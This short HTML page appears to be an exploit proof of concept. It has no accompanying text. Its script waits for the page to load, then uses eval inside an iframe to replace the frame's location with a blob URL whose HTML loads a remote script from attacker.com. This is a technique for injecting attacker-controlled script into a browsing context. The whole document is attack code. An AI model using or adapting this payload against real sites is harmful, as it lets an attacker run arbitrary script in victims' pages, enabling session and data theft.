<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGlNiaHGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGlNiaHGGGGG.onload=_=>GGGGGlNiaHGGGGG.contentWindow.eval("location=URL.createObjectURL(new Blob(['<script src=https://attacker.com/static/static.js><\/script>'],{type:'text/html'}))");GGGGGlNiaHGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>